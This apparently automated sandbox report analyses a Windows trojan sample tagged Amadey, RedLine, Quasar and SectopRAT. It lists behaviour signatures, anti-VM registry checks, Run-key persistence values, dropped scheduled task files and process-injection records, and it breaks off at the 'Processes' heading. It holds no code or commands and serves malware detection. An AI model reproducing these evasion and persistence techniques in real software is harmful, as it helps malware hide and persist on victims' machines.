Malware Analysis Report

2024-10-19 08:35

Sample ID 240731-cf4r7avgmh
Target f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe
SHA256 f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce
Tags
amadey 0657d1 fed3aa discovery evasion persistence trojan quasar redline sectoprat exodusmarket.io office04 credential_access infostealer rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce

Threat Level: Known bad

The file f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe was found to be: Known bad.

Malicious Activity Summary

amadey 0657d1 fed3aa discovery evasion persistence trojan quasar redline sectoprat exodusmarket.io office04 credential_access infostealer rat spyware stealer

Quasar RAT

RedLine payload

Amadey

SectopRAT payload

RedLine

Quasar payload

SectopRAT

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Credentials from Password Stores: Credentials from Web Browsers

Downloads MZ/PE file

Checks BIOS information in registry

Identifies Wine through registry keys

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Reads user/profile data of web browsers

Checks installed software on the system

Blocklisted process makes network request

Enumerates connected drives

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

System Location Discovery: System Language Discovery

Program crash

Browser Information Discovery

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Scheduled Task/Job: Scheduled Task

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Uses Volume Shadow Copy service COM API

Modifies registry class

Enumerates system info in registry

Modifies data under HKEY_USERS

Checks processor information in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-31 02:02

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-31 02:02

Reported

2024-07-31 02:04

Platform

win7-20240705-en

Max time kernel

32s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe"

Signatures

Amadey

trojan amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1000030001\77d7353e97.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000030001\77d7353e97.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000030001\77d7353e97.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1000030001\77d7353e97.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Windows\CurrentVersion\Run\d42f45addf.exe = "C:\\Users\\Admin\\1000029002\\d42f45addf.exe" C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Windows\CurrentVersion\Run\c81c483364.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020001\\c81c483364.exe" C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\explorti.job C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
File created C:\Windows\Tasks\axplong.job C:\Users\Admin\AppData\Local\Temp\1000030001\77d7353e97.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1000020001\c81c483364.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\1000029002\d42f45addf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1000030001\77d7353e97.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000030001\77d7353e97.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\1000029002\d42f45addf.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2296 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
PID 2296 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
PID 2296 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
PID 2296 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
PID 2064 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\Admin\AppData\Local\Temp\1000020001\c81c483364.exe
PID 2064 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\Admin\AppData\Local\Temp\1000020001\c81c483364.exe
PID 2064 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\Admin\AppData\Local\Temp\1000020001\c81c483364.exe
PID 2064 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\Admin\AppData\Local\Temp\1000020001\c81c483364.exe
PID 2512 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\1000020001\c81c483364.exe C:\Windows\system32\cmd.exe
PID 2512 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\1000020001\c81c483364.exe C:\Windows\system32\cmd.exe
PID 2512 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\1000020001\c81c483364.exe C:\Windows\system32\cmd.exe
PID 2512 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\1000020001\c81c483364.exe C:\Windows\system32\cmd.exe
PID 1572 wrote to memory of 1856 N/A C:\Windows\system32\cmd.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1572 wrote to memory of 1856 N/A C:\Windows\system32\cmd.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1572 wrote to memory of 1856 N/A C:\Windows\system32\cmd.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1572 wrote to memory of 2436 N/A C:\Windows\system32\cmd.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1572 wrote to memory of 2436 N/A C:\Windows\system32\cmd.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1572 wrote to memory of 2436 N/A C:\Windows\system32\cmd.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1856 wrote to memory of 1800 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1856 wrote to memory of 1800 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1856 wrote to memory of 1800 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2436 wrote to memory of 1128 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2436 wrote to memory of 1128 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2436 wrote to memory of 1128 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2436 wrote to memory of 1128 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2436 wrote to memory of 1128 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2436 wrote to memory of 1128 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2436 wrote to memory of 1128 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2436 wrote to memory of 1128 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2436 wrote to memory of 1128 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2436 wrote to memory of 1128 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2436 wrote to memory of 1128 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2436 wrote to memory of 1128 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1128 wrote to memory of 2244 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1128 wrote to memory of 2244 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1128 wrote to memory of 2244 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1856 wrote to memory of 836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1856 wrote to memory of 836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1856 wrote to memory of 836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1856 wrote to memory of 836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1856 wrote to memory of 836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1856 wrote to memory of 836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1856 wrote to memory of 836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1856 wrote to memory of 836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1856 wrote to memory of 836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1856 wrote to memory of 836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1856 wrote to memory of 836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1856 wrote to memory of 836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1856 wrote to memory of 836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1856 wrote to memory of 836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1856 wrote to memory of 836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1856 wrote to memory of 836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1856 wrote to memory of 836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1856 wrote to memory of 836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1856 wrote to memory of 836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1856 wrote to memory of 836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1856 wrote to memory of 836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1856 wrote to memory of 836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1856 wrote to memory of 836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1856 wrote to memory of 836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1856 wrote to memory of 836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1856 wrote to memory of 836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1856 wrote to memory of 836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1856 wrote to memory of 836 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Task Scheduler COM API

persistence

Processes

